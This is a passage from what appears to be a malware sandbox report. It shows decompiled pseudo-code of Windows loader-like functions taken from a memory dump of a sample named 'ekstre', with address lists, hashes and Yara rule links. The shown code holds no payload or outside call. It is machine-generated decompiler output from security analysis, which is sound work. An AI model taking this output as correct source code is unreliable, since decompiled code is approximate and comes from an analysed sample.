													_t334 =  &(_t334[1]);
													_v52 = _t334;
													__eflags = _t274;
													if(_t274 == 0) {
														goto L45;
													}
													_t274 =  *_t334 & 0x0000ffff;
												}
											}
											_t328 =  &(_t334[1]);
											_v52 = _t328;
											_t275 = _a16;
											__eflags = _t275;
											if(_t275 == 0) {
												_push(_t328 - _t400 & 0xfffffffe);
												_push(_t400);
												_push(_v92);
												L90:
												_t238 = E341B8C00();
												_t444 = _t444 + 0xc;
												L91:
												__eflags = _v29;
												if(_v29 != 0) {
													_t238 = E341B8F40(0x342663a0, 0, 0x234);
													_t444 = _t444 + 0xc;
												}
												goto L60;
											}
											_t427 = _a20;
											__eflags = _t427 - _v80;
											if(_t427 <= _v80) {
												_t428 = _t427 + _t427;
												L341B88C0(_v56, _t275, _t428);
												_t444 = _t444 + 0xc;
												_t361 = _v56 + _t428;
												_t238 = 0;
												 *_t361 = 0;
												_t362 = _t361 + 2;
												__eflags = _a20 - _v80;
												if(_a20 == _v80) {
													goto L91;
												}
												_t282 = _t328 - _t400 & 0xfffffffe;
												__eflags = _t282;
												_push(_t282);
												_push(_t400);
												_push(_t362);
												goto L90;
											}
											_t406 = _v36;
											_t284 = E3419B870(_t359,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t406);
											_t328 = _v52;
											_t368 = (_t328 - _t406 >> 1) - _v84 + _t427 + (_t328 - _t406 >> 1) - _v84 + _t427;
											_v80 = _t368;
											__eflags = _t368 - _t284;
											if(_t368 < _t284) {
												_t432 = _v56 + 2 + _t427 + _t427;
												_v88 = _v40;
												E341B8C00(_t432, _v40, _t328 - _v40 & 0xfffffffe);
												 *((short*)(_t432 - 2)) = 0;
												_t238 = L341B88C0(_t432 - 2 - _t427 + _t427, _a16, _t427 + _t427);
												_t444 = _t444 + 0x18;
												__eflags = _a4;
												if(_a4 == 0) {
													_t370 = _v48;
													 *((intOrPtr*)(_t370 + 0x48)) = _v36;
													_t238 = _v80;
													 *((intOrPtr*)(_t370 + 0x290)) = _v80;
													_t221 = _t370 + 0x294;
													 *_t221 =  *(_t370 + 0x294) + 1;
													__eflags =  *_t221;
												}
												__eflags = _v29;
												if(_v29 != 0) {
													_t238 = E341B8F40(0x342663a0, 0, 0x234);
													_t444 = _t444 + 0xc;
												}
												_t400 = _v88;
												goto L60;
											}
											_t408 = L3419B9FA(_t368);
											_v88 = _t408;
											__eflags = _t408;
											if(_t408 == 0) {
												goto L111;
											}
											_t435 = (_v56 - _v36 >> 1) + (_v56 - _v36 >> 1);
											L341B88C0(_t408, _v36, _t435);
											_t409 = _t408 + _t435;
											_t437 = _a20 + _a20;
											L341B88C0(_t409, _a16, _t437);
											 *((short*)(_t409 + _t437)) = 0;
											L341B88C0(_t409 + _t437 + 2, _v40, _t328 - _v40 & 0xfffffffe);
											_t444 = _t444 + 0x24;
											_t372 = _a4;
											_t299 = _v88;
											__eflags = _t372;
											if(_t372 != 0) {
												 *_t372 = _t299;
											} else {
												_t372 = _v48;
												 *((intOrPtr*)(_t372 + 0x48)) = _t299;
												 *(_t372 + 0x290) = _v80;
												_t96 = _t372 + 0x294;
												 *_t96 =  *(_t372 + 0x294) + 1;
												__eflags =  *_t96;
											}
											__eflags = _v29;
											if(_v29 != 0) {
												E341B8F40(0x342663a0, 0, 0x234);
												_t444 = _t444 + 0xc;
											}
											__eflags = _v30;
											if(_v30 != 0) {
												_push( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
												E3417E740(_t372);
												_v30 = 0;
											}
											_t238 = L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v36);
											_t400 = _v40;
											_t328 = _v52;
											goto L60;
										}
										if(__eflags < 0) {
											__eflags = _v44 - _t328;
											if(_v44 == _t328) {
												_t238 = _v92;
												_v44 = _v92;
											}
										}
										goto L16;
									}
								}
								_t359 = _a12 - _v88;
								goto L33;
							}
							L60:
							_t342 = _v36;
							_t414 = _v44;
							goto L61;
						}
					} else {
						_t324 = 0;
						__eflags = 0;
						_t441 = _a20;
						while(1) {
							__eflags = _t324 - _t441;
							if(_t324 >= _t441) {
								goto L12;
							}
							__eflags =  *((short*)(_t340 + _t324 * 2));
							if( *((short*)(_t340 + _t324 * 2)) == 0) {
								goto L120;
							} else {
								_t324 = _t324 + 1;
								continue;
							}
						}
						goto L12;
					}
				}
			}

0x3419b1e5
0x3419b1e7
0x3419b1ec
0x3419b1f7
0x3419b1f8
0x3419b1fe
0x3419b203
0x3419b208
0x3419b20c
0x3419b212
0x3419b219
0x3419b220
0x3419b224
0x3419b228
0x3419b22d
0x341de41b
0x341de41b
0x3419b57d
0x3419b580
0x3419b58e
0x3419b58e
0x3419b233
0x3419b23a
0x00000000
0x3419b240
0x3419b240
0x3419b245
0x3419b249
0x3419b250
0x00000000
0x3419b25f
0x3419b25f
0x3419b260
0x00000000
0x3419b260
0x3419b250
0x3419b265
0x3419b268
0x3419b26a
0x3419b283
0x3419b289
0x3419b28c
0x3419b28f
0x3419b292
0x3419b295
0x3419b29c
0x3419b29e
0x3419b2a1
0x3419b2a4
0x3419b2a6
0x3419b76c
0x3419b76e
0x3419b771
0x3419b774
0x00000000
0x00000000
0x341de27e
0x341de281
0x341de283
0x341de296
0x341de296
0x00000000
0x341de285
0x341de286
0x341de28b
0x341de28e
0x341de290
0x00000000
0x00000000
0x00000000
0x341de290
0x3419b2ac
0x3419b2ac
0x3419b2b0
0x3419b2bd
0x3419b2c2
0x3419b2c5
0x3419b2c8
0x3419b2cb
0x3419b2cb
0x3419b2d2
0x3419b2d4
0x3419b2d7
0x3419b2d9
0x3419b2dc
0x3419b2de
0x3419b55c
0x3419b55c
0x3419b55e
0x3419b709
0x3419b70b
0x3419b70b
0x3419b564
0x3419b566
0x3419b591
0x3419b595
0x00000000
0x00000000
0x3419b597
0x3419b599
0x341de3e5
0x341de3e8
0x341de3ee
0x341de3f5
0x3419b5f8
0x3419b5f8
0x3419b5fb
0x3419b5fd
0x3419b79b
0x3419b7ab
0x3419b7b3
0x3419b7ba
0x3419b7bf
0x3419b7c2
0x3419b7c5
0x3419b7c7
0x3419b7d5
0x3419b7da
0x3419b7da
0x3419b7dd
0x3419b7df
0x3419b7e7
0x3419b7ea
0x3419b7ed
0x3419b7f3
0x3419b7fb
0x3419b803
0x3419b805
0x3419b808
0x3419b80a
0x3419b810
0x3419b813
0x3419b816
0x00000000
0x3419b81c
0x3419b81c
0x3419b822
0x3419b825
0x3419b828
0x3419b82e
0x00000000
0x3419b82e
0x3419b816
0x3419b60a
0x3419b60c
0x3419b60f
0x3419b611
0x341de35f
0x341de35f
0x00000000
0x341de35f
0x3419b617
0x3419b619
0x341de3fc
0x3419b61f
0x3419b624
0x3419b624
0x3419b626
0x3419b62e
0x3419b633
0x3419b636
0x3419b636
0x3419b63c
0x3419b642
0x3419b649
0x3419b654
0x3419b65b
0x3419b661
0x3419b667
0x3419b66e
0x3419b679
0x3419b67d
0x3419b680
0x3419b683
0x3419b685
0x341de405
0x341de408
0x3419b68b
0x3419b693
0x3419b69b
0x3419b69e
0x3419b6a0
0x3419b6ae
0x3419b6b3
0x3419b6a0
0x3419b6b6
0x3419b6b9
0x3419b6bc
0x3419b6be
0x3419b77f
0x3419b6c4
0x3419b6c4
0x3419b6c7
0x3419b6cd
0x3419b6d3
0x3419b6d3
0x3419b6d3
0x3419b6d3
0x3419b6d9
0x3419b6dd
0x3419b6e5
0x3419b6e8
0x3419b6ed
0x3419b6ed
0x3419b6ff
0x00000000
0x3419b6ff
0x3419b59f
0x3419b5a2
0x3419b5a2
0x3419b5a2
0x3419b5a5
0x3419b5a8
0x00000000
0x00000000
0x3419b5b0
0x3419b5b0
0x3419b5b3
0x3419b5b6
0x3419b5b9
0x00000000
0x00000000
0x3419b5bb
0x3419b5bb
0x3419b5b0
0x3419b5c3
0x3419b5d7
0x3419b5d9
0x3419b5e3
0x3419b5e8
0x3419b5e8
0x3419b5eb
0x3419b5f2
0x3419b5f5
0x00000000
0x3419b568
0x3419b568
0x3419b568
0x3419b56b
0x3419b56b
0x3419b56e
0x3419b56e
0x3419b575
0x3419b57a
0x00000000
0x3419b57a
0x3419b566
0x3419b2e4
0x3419b2e7
0x3419b2f0
0x3419b2f0
0x3419b2f0
0x3419b2f3
0x00000000
0x00000000
0x3419b2f9
0x3419b2fb
0x3419b2fe
0x3419b2fe
0x3419b300
0x3419b303
0x3419b303
0x3419b306
0x3419b309
0x3419b30c
0x3419b30f
0x00000000
0x00000000
0x3419b311
0x3419b314
0x00000000
0x00000000
0x3419b31a
0x3419b31c
0x3419b31f
0x3419b31f
0x3419b322
0x3419b325
0x3419b327
0x3419b330
0x3419b330
0x3419b333
0x00000000
0x00000000
0x3419b335
0x3419b338
0x3419b338
0x3419b33f
0x3419b33f
0x3419b341
0x3419b343
0x3419b346
0x00000000
0x3419b346
0x3419b349
0x3419b34c
0x3419b34f
0x3419b352
0x3419b355
0x3419b358
0x3419b35b
0x3419b35d
0x3419b35f
0x3419b35f
0x3419b363
0x3419b366
0x3419b370
0x3419b370
0x3419b372
0x00000000
0x00000000
0x3419b37b
0x3419b381
0x3419b384
0x3419b388
0x3419b38c
0x3419b390
0x3419b393
0x3419b3cc
0x3419b3cc
0x3419b3cf
0x3419b3d2
0x3419b3d5
0x3419b3d8
0x00000000
0x3419b3d8
0x3419b395
0x3419b399
0x3419b3f4
0x3419b3f8
0x341de29f
0x341de2a5
0x00000000
0x00000000
0x341de2ab
0x341de2b2
0x341de2b6
0x00000000
0x00000000
0x341de2c4
0x341de2d8
0x341de2ea
0x341de2f0
0x341de2f4
0x341de2f7
0x3419b409
0x3419b409
0x00000000
0x3419b409
0x3419b3fe
0x3419b3fe
0x3419b3fe
0x3419b405
0x00000000
0x3419b405
0x3419b39b
0x3419b39b
0x3419b39f
0x3419b3dd
0x3419b3e1
0x341de2ff
0x341de305
0x341de30b
0x341de312
0x341de316
0x341de324
0x341de338
0x341de346
0x341de34c
0x341de350
0x341de354
0x341de357
0x341de357
0x341de316
0x3419b3e7
0x3419b3e7
0x3419b3ee
0x3419b3ee
0x3419b3e1
0x3419b3a1
0x3419b3a4
0x00000000
0x3419b3a6
0x3419b3a6
0x3419b3ac
0x3419b3ac
0x3419b3ae
0x3419b3ae
0x3419b3b0
0x3419b417
0x3419b419
0x3419b420
0x3419b420
0x3419b420
0x3419b423
0x3419b426
0x00000000
0x00000000
0x3419b430
0x3419b430
0x3419b433
0x3419b436
0x3419b439
0x00000000
0x00000000
0x3419b43b
0x3419b43b
0x3419b430
0x3419b440
0x3419b443
0x3419b446
0x3419b449
0x3419b44b
0x3419b78d
0x3419b78e
0x3419b78f
0x3419b741
0x3419b741
0x3419b746
0x3419b749
0x3419b749
0x3419b74d
0x3419b75f
0x3419b764
0x3419b764
0x00000000
0x3419b74d
0x3419b451
0x3419b454
0x3419b457
0x3419b713
0x3419b71a
0x3419b71f
0x3419b725
0x3419b727
0x3419b729
0x3419b72c
0x3419b732
0x3419b735
0x00000000
0x00000000
0x3419b73b
0x3419b73b
0x3419b73e
0x3419b73f
0x3419b740
0x00000000
0x3419b740
0x3419b45d
0x3419b46c
0x3419b471
0x3419b47f
0x3419b481
0x3419b484
0x3419b486
0x341de374
0x341de37b
0x341de386
0x341de393
0x341de39d
0x341de3a2
0x341de3a5
0x341de3a9
0x341de3ab
0x341de3b1
0x341de3b4
0x341de3b7
0x341de3bd
0x341de3bd
0x341de3bd
0x341de3bd
0x341de3c3
0x341de3c7
0x341de3d5
0x341de3da
0x341de3da
0x341de3dd
0x00000000
0x341de3dd
0x3419b491
0x3419b493
0x3419b496
0x3419b498
0x00000000
0x00000000
0x3419b4a8
0x3419b4ae
0x3419b4b6
0x3419b4bb
0x3419b4c2
0x3419b4ce
0x3419b4df
0x3419b4e4
0x3419b4e7
0x3419b4ea
0x3419b4ed
0x3419b4ef
0x3419b794
0x3419b4f5
0x3419b4f5
0x3419b4f8
0x3419b4fe
0x3419b504
0x3419b504
0x3419b504
0x3419b504
0x3419b50a
0x3419b50e
0x3419b51c
0x3419b521
0x3419b521
0x3419b524
0x3419b528
0x3419b530
0x3419b533
0x3419b538
0x3419b538
0x3419b54b
0x3419b550
0x3419b553
0x00000000
0x3419b553
0x3419b3b2
0x3419b3b8
0x3419b3bb
0x3419b3c1
0x3419b3c4
0x3419b3c4
0x3419b3bb
0x00000000
0x3419b3b2
0x3419b3a4
0x3419b412
0x00000000
0x3419b412
0x3419b556
0x3419b556
0x3419b559
0x00000000
0x3419b559
0x3419b26c
0x3419b26c
0x3419b26c
0x3419b26e
0x3419b271
0x3419b271
0x3419b273
0x00000000
0x00000000
0x3419b275
0x3419b27a
0x00000000
0x3419b280
0x3419b280
0x00000000
0x3419b280
0x3419b27a
0x00000000
0x3419b271
0x3419b26a

Strings

@[&4@[&4, xrefs: 3419B1FC

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @[&4@[&4
API String ID: 0-4054759001
Opcode ID: f633005f87069964ecb1fda160499e685a4a55da870364236a1ed9366e30e1b4
Instruction ID: bda800ad2a32b235b99ef5eb6e316331baab87c164aeaf139684d927bdb6ae2d
Opcode Fuzzy Hash: f633005f87069964ecb1fda160499e685a4a55da870364236a1ed9366e30e1b4
Instruction Fuzzy Hash: CF329BB5E00A19DBDB14CFA8C990BEEBBB6FF84744F14016DE805AB390E7759901CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3419E507 Relevance: 1.8, APIs: 1, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E3419E507(intOrPtr* __ecx, intOrPtr* __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				char _v20;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				char _v64;
				signed int _v68;
				signed int _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				signed int _v84;
				char _v88;
				signed int _t78;
				void* _t81;
				char* _t84;
				intOrPtr _t85;
				intOrPtr _t97;
				signed int _t100;
				signed int _t105;
				intOrPtr _t108;
				signed int _t116;
				signed int _t117;
				signed char* _t118;
				signed int _t125;
				signed int _t126;
				signed char* _t127;
				intOrPtr* _t131;
				char* _t132;
				intOrPtr* _t151;
				signed int _t152;
				intOrPtr _t153;
				signed int _t155;
				signed int _t156;

				_t151 = __ecx;
				_t131 = __edx;
				_v28 = __edx;
				_t153 =  *((intOrPtr*)(__ecx + 0x20));
				_v32 =  *((intOrPtr*)(__ecx + 0x60));
				if(E3419E662(__ecx, 0) != 0) {
					return 0xc000022d;
				} else {
					_t135 =  *((intOrPtr*)(_t153 + 0x18));
					_t6 = _t153 + 0x24; // 0x123
					_t78 = _t6;
					_t146 = _t78;
					_v16 = _t78;
					E3418DF36( *((intOrPtr*)(_t153 + 0x18)), _t146, 0x14a5);
					_v88 = 0x18;
					_v84 = 0;
					0x840 = 0x40;
					if( *0x34265d58 != 0) {
					}
				}
				_v76 = 0x840;
				_v80 = _t131;
				_v72 = 0;
				_v68 = 0;
				_t81 = E34183C40();
				_t132 = 0x7ffe0384;
				if(_t81 != 0) {
					_t84 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t84 = 0x7ffe0384;
				}
				if( *_t84 != 0) {
					_t85 =  *[fs:0x30];
					__eflags =  *(_t85 + 0x240) & 0x00000004;
					if(( *(_t85 + 0x240) & 0x00000004) != 0) {
						_t126 = E34183C40();
						__eflags = _t126;
						if(_t126 == 0) {
							_t127 = 0x7ffe0385;
						} else {
							_t127 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t127 & 0x00000020;
						if(( *_t127 & 0x00000020) != 0) {
							_t146 = _t146 | 0xffffffff;
							_t135 = 0x1485;
							E341F0227(0x1485, _t146, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *( *[fs:0x30] + 0x68) & 0x00040000) != 0) {
					_t135 = _v28;
					_push(0);
					_push(0);
					_push(0);
					_v48 =  *_t135;
					_v44 =  *((intOrPtr*)(_t135 + 4));
					_push(8);
					_push( &_v48);
					_push(0x26);
					E341B4580();
				}
				_v24 = 0;
				while(1) {
					_push(0x60);
					_push(5);
					_push( &_v64);
					_push( &_v88);
					_push(0x100021);
					_push( &_v12);
					_t155 = E341B2CE0();
					if(_t155 >= 0) {
						break;
					}
					__eflags = _t155 - 0xc0000034;
					if(_t155 == 0xc0000034) {
						L38:
						_t155 = 0xc0000135;
						L39:
						__eflags = _t155;
						if(_t155 < 0) {
							L19:
							return _t155;
						}
						break;
					}
					__eflags = _t155 - 0xc000003a;
					if(_t155 == 0xc000003a) {
						goto L38;
					}
					__eflags = _t155 - 0xc0000022;
					if(_t155 != 0xc0000022) {
						goto L39;
					}
					__eflags = _v24;
					if(__eflags != 0) {
						goto L19;
					}
					_t135 = _t151;
					_t125 = L341EFBC2(_t151, __eflags);
					__eflags = _t125;
					if(_t125 == 0) {
						goto L19;
					}
					_v24 = 1;
				}
				if( *0x34265d3c != 0) {
					_t146 = _v12;
					_t155 = E341F3ECC(_t151, _v12, _t135);
					__eflags = _t155;
					if(_t155 >= 0) {
						goto L10;
					}
					__eflags =  *0x34265d10;
					if( *0x34265d10 != 0) {
						L18:
						_push(_v12);
						E341B2A80();
						goto L19;
					}
				}
				L10:
				if(( *(_t151 + 0x10) & 0x01000000) != 0) {
					_t97 =  *[fs:0x30];
					__eflags =  *(_t97 + 3) & 0x00000010;
					if(( *(_t97 + 3) & 0x00000010) != 0) {
						goto L11;
					}
					_t146 =  *(_t151 + 0x20);
					_t155 = E341F3E62(_v12,  *(_t151 + 0x20),  &_v36, 8,  &_v5);
					__eflags = _t155;
					if(_t155 < 0) {
						goto L18;
					}
				}
				L11:
				_push(_v12);
				_push(0x1000000);
				_push(0x10);
				_push(0);
				_push(0);
				_push(0xd);
				_push( &_v20);
				_t155 = E341B2E50();
				if(_t155 < 0) {
					__eflags = _t155 - 0xc000047e;
					if(_t155 == 0xc000047e) {
						L56:
						_t100 = E341EC3B0(_t155);
						_t152 = _v16;
						_t155 = _t100;
						L57:
						L341AC98F(_t155, 0x1485, 0, _t152);
						goto L18;
					}
					__eflags = _t155 - 0xc000047f;
					if(_t155 == 0xc000047f) {
						goto L56;
					}
					__eflags = _t155 - 0xc0000462;
					if(_t155 == 0xc0000462) {
						goto L56;
					}
					_t152 = _v16;
					__eflags = _t155 - 0xc0000017;
					if(_t155 != 0xc0000017) {
						__eflags = _t155 - 0xc000009a;
						if(_t155 != 0xc000009a) {
							__eflags = _t155 - 0xc000012d;
							if(_t155 != 0xc000012d) {
								_v56 = _t152;
								_push( &_v40);
								_push("true");
								_v52 = _t155;
								_push( &_v56);
								_push("true");
								_push(2);
								_push(0xc000007b);
								_t105 = E341B4020();
								__eflags = _t105;
								if(_t105 >= 0) {
									__eflags =  *0x342665f4 - 3;
									if( *0x342665f4 != 3) {
										 *0x34265a9c =  *0x34265a9c + 1;
									}
								}
							}
						}
					}
					goto L57;
				}
				if(E34183C40() != 0) {
					_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t132 != 0) {
					_t108 =  *[fs:0x30];
					__eflags =  *(_t108 + 0x240) & 0x00000004;
					if(( *(_t108 + 0x240) & 0x00000004) != 0) {
						_t117 = E34183C40();
						__eflags = _t117;
						if(_t117 == 0) {
							_t118 = 0x7ffe0385;
						} else {
							_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						__eflags =  *_t118 & 0x00000020;
						if(( *_t118 & 0x00000020) != 0) {
							E341F0227(0x1486, _t146 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
						}
					}
				}
				if(( *(_t151 + 0x10) & 0x00000100) != 0) {
					L21:
					__eflags = _t155;
					if(_t155 < 0) {
						goto L17;
					} else {
						goto L16;
					}
				} else {
					if( *0x342668e4 != 0) {
						_t156 =  *0x34265b64; // 0x0
						asm("ror esi, cl");
						 *0x342691e0(_v12, _v28, 0x20);
						_t116 =  *(_t156 ^  *0x7ffe0330)();
						_t70 = _t116 + 0x3ffffddb; // 0x3ffffddb
						asm("sbb esi, esi");
						_t155 =  ~_t70 & _t116;
						goto L21;
					}
					L16:
					_t155 = E34191332(_t151, _v20);
					if(_v32 != 0) {
						__eflags = _t155;
						if(_t155 < 0) {
							goto L17;
						}
						 *(_t151 + 0x64) = _v12;
						 *((intOrPtr*)(_t151 + 0xc)) = _v20;
						goto L19;
					}
					L17:
					_push(_v20);
					E341B2A80();
					goto L18;
				}
			}

0x3419e512
0x3419e514
0x3419e518
0x3419e51e
0x3419e521
0x3419e52b
0x00000000
0x3419e531
0x3419e531
0x3419e534
0x3419e534
0x3419e53c
0x3419e53e
0x3419e541
0x3419e548
0x3419e558
0x3419e55b
0x3419e55c
0x3419e55c
0x3419e55c
0x3419e563
0x3419e566
0x3419e569
0x3419e56c
0x3419e56f
0x3419e574
0x3419e57b
0x341df88f
0x3419e581
0x3419e581
0x3419e581
0x3419e586
0x341df899
0x341df89f
0x341df8a6
0x341df8ac
0x341df8b1
0x341df8b3
0x341df8c5
0x341df8b5
0x341df8be
0x341df8be
0x341df8ca
0x341df8cd
0x341df8d9
0x341df8dc
0x341df8e1
0x341df8e1
0x341df8cd
0x341df8a6
0x3419e599
0x341df8eb
0x341df8ee
0x341df8ef
0x341df8f0
0x341df8f3
0x341df8f9
0x341df8ff
0x341df901
0x341df902
0x341df904
0x341df904
0x3419e59f
0x3419e5a2
0x3419e5a2
0x3419e5a4
0x3419e5a9
0x3419e5ad
0x3419e5ae
0x3419e5b6
0x3419e5bc
0x3419e5c0
0x00000000
0x00000000
0x341df90e
0x341df914
0x341df94b
0x341df94b
0x341df950
0x341df950
0x341df952
0x3419e655
0x00000000
0x3419e655
0x00000000
0x341df958
0x341df916
0x341df91c
0x00000000
0x00000000
0x341df91e
0x341df924
0x00000000
0x00000000
0x341df926
0x341df92a
0x00000000
0x00000000
0x341df930
0x341df932
0x341df937
0x341df939
0x00000000
0x00000000
0x341df93f
0x341df93f
0x3419e5cd
0x341df95d
0x341df968
0x341df96a
0x341df96c
0x00000000
0x00000000
0x341df972
0x341df979
0x3419e64d
0x3419e64d
0x3419e650
0x00000000
0x3419e650
0x341df97f
0x3419e5d3
0x3419e5da
0x341df984
0x341df98a
0x341df98e
0x00000000
0x00000000
0x341df994
0x341df9a9
0x341df9ab
0x341df9ad
0x00000000
0x00000000
0x341df9b3
0x3419e5e0
0x3419e5e0
0x3419e5e6
0x3419e5eb
0x3419e5ed
0x3419e5ef
0x3419e5f1
0x3419e5f3
0x3419e5f9
0x3419e5fd
0x341df9b8
0x341df9be
0x341dfa1e
0x341dfa1f
0x341dfa24
0x341dfa27
0x341dfa29
0x341dfa33
0x00000000
0x341dfa33
0x341df9c0
0x341df9c6
0x00000000
0x00000000
0x341df9c8
0x341df9ce
0x00000000
0x00000000
0x341df9d0
0x341df9d3
0x341df9d9
0x341df9db
0x341df9e1
0x341df9e3
0x341df9e9
0x341df9ee
0x341df9f1
0x341df9f2
0x341df9f7
0x341df9fa
0x341df9fb
0x341df9fd
0x341df9ff
0x341dfa04
0x341dfa09
0x341dfa0b
0x341dfa0d
0x341dfa14
0x341dfa16
0x341dfa16
0x341dfa14
0x341dfa0b
0x341df9e9
0x341df9e1
0x00000000
0x341df9d9
0x3419e60a
0x341dfa46
0x341dfa46
0x3419e613
0x341dfa51
0x341dfa57
0x341dfa5e
0x341dfa64
0x341dfa69
0x341dfa6b
0x341dfa7d
0x341dfa6d
0x341dfa76
0x341dfa76
0x341dfa82
0x341dfa85
0x341dfa9b
0x341dfa9b
0x341dfa85
0x341dfa5e
0x3419e620
0x3419e65c
0x3419e65c
0x3419e65e
0x00000000
0x3419e660
0x00000000
0x3419e660
0x3419e622
0x3419e629
0x341dfaad
0x341dfac1
0x341dfac7
0x341dfacd
0x341dfacf
0x341dfad7
0x341dfad9
0x00000000
0x341dfad9
0x3419e62f
0x3419e63d
0x3419e63f
0x341dfae0
0x341dfae2
0x00000000
0x00000000
0x341dfaeb
0x341dfaf1
0x00000000
0x341dfaf1
0x3419e645
0x3419e645
0x3419e648
0x00000000
0x3419e648

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9217ce5898d70040f8ceb68a81b3a6997faed93149b167c40088d08484672c
Instruction ID: 43b006adc2de155bb62489cbfc72e228561290febb9b029000c17a0ac6887fed
Opcode Fuzzy Hash: 2f9217ce5898d70040f8ceb68a81b3a6997faed93149b167c40088d08484672c
Instruction Fuzzy Hash: 98A1E3B5E00B14EFFB218BA4C8D4FAEBBE5AB05754F0141A5E914AB2D0DB749E44CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 34171051 Relevance: 1.8, APIs: 1, Instructions: 259
timeCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E34171051(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char* _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				void* _v96;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t151;
				signed int _t153;
				signed int _t154;
				signed int _t155;
				intOrPtr _t160;
				signed int _t161;
				signed int _t172;
				intOrPtr _t180;
				signed int _t195;
				signed int _t196;
				char _t197;
				signed int _t200;
				void* _t201;
				intOrPtr _t202;
				signed int _t204;
				intOrPtr* _t206;
				intOrPtr _t207;
				char _t209;
				signed int _t210;
				intOrPtr _t214;
				intOrPtr* _t220;
				signed int _t222;
				signed int _t223;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t232;
				signed int _t233;
				signed int _t234;
				void* _t235;
				intOrPtr _t238;
				signed int _t239;
				void* _t243;
				signed int _t244;
				signed int _t246;
				signed int _t247;

				_t246 = (_t244 & 0xfffffff8) - 0x6c;
				_v8 =  *0x3426b370 ^ _t246;
				_t238 = __edx;
				_t226 = __ecx;
				_v36 = 0;
				_t204 = 6;
				_t232 =  &_v84;
				_v52 =  *((intOrPtr*)(__ecx + 0x48));
				_v40 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 = __edx;
				_v48 = __ecx;
				_t151 = memset(_t232, 0, _t204 << 2);
				_t247 = _t246 + 0xc;
				_t233 = _t232 + _t204;
				if(_v52 == 2) {
					_t234 =  *(_t226 + 0x60);
					_t200 =  *(_t226 + 0x64);
					_v63 =  *((intOrPtr*)(_t226 + 0x4c));
					_t153 =  *((intOrPtr*)(_t226 + 0x58));
					_v104 = _t153;
					_v76 = _t153;
					_t154 =  *((intOrPtr*)(_t226 + 0x5c));
					_v100 = _t154;
					_v72 = _t154;
					_t155 = 0;
					L19:
					_v80 = _t200;
					_v84 = _t234;
					L8:
					if( *((intOrPtr*)(_t226 + 0x74)) > 0) {
						_t81 = _t226 + 0x84; // 0x124
						_t206 = _t81;
						_v92 = _t206;
						while(1) {
							_t207 =  *_t206;
							if(_t207 >= 0 || _t207 == 0x80000000) {
								break;
							}
							_t155 = _t155 + 1;
							_t206 = _v92 + 0x10;
							_v92 = _t206;
							if(_t155 <  *((intOrPtr*)(_t226 + 0x74))) {
								continue;
							}
							goto L9;
						}
						_v88 = _t155 << 4;
						_t239 = _v88;
						_t209 = _t226 +  *((intOrPtr*)(_t239 + _t226 + 0x78));
						_v44 = _t209;
						asm("adc eax, [esi+edx+0x7c]");
						_v24 = 0;
						_v28 = _t209;
						_v20 =  *((intOrPtr*)(_t239 + _t226 + 0x80));
						_t160 =  *_v92;
						_v36 =  &_v28;
						_t238 = _v32;
						_v16 = _t160;
						if( *(_t226 + 0x4e) >= 0 || _t160 != 0x80000000) {
							goto L9;
						} else {
							 *((intOrPtr*)(_t209 + 8)) = 0;
							 *((intOrPtr*)(_t209 + 0xc)) = 0;
							 *((intOrPtr*)(_t209 + 0x14)) = 0;
							 *((intOrPtr*)(_t209 + 0x10)) = _v20;
							_t214 = 0;
							_t172 = _t238 + 0x66;
							_v92 = 0;
							_v88 = _t172;
							do {
								if( *((char*)(_t172 - 2)) == 0) {
									goto L31;
								}
								_t214 = _v92;
								if(( *_t172 & 0x000000ff) == ( *(_t226 + 0x4e) & 0x7fff)) {
									_t172 = E341B6600(1, _t214 + 0x20, 0);
									_t214 = _v44;
									 *(_t214 + 8) = _t172;
									 *((intOrPtr*)(_t214 + 0xc)) = 0;
									L34:
									if(_v40 == 0) {
										goto L9;
									}
									_t202 = _v40;
									_t236 = _t202 + 0x1c;
									L34182330(_t172, _t202 + 0x1c);
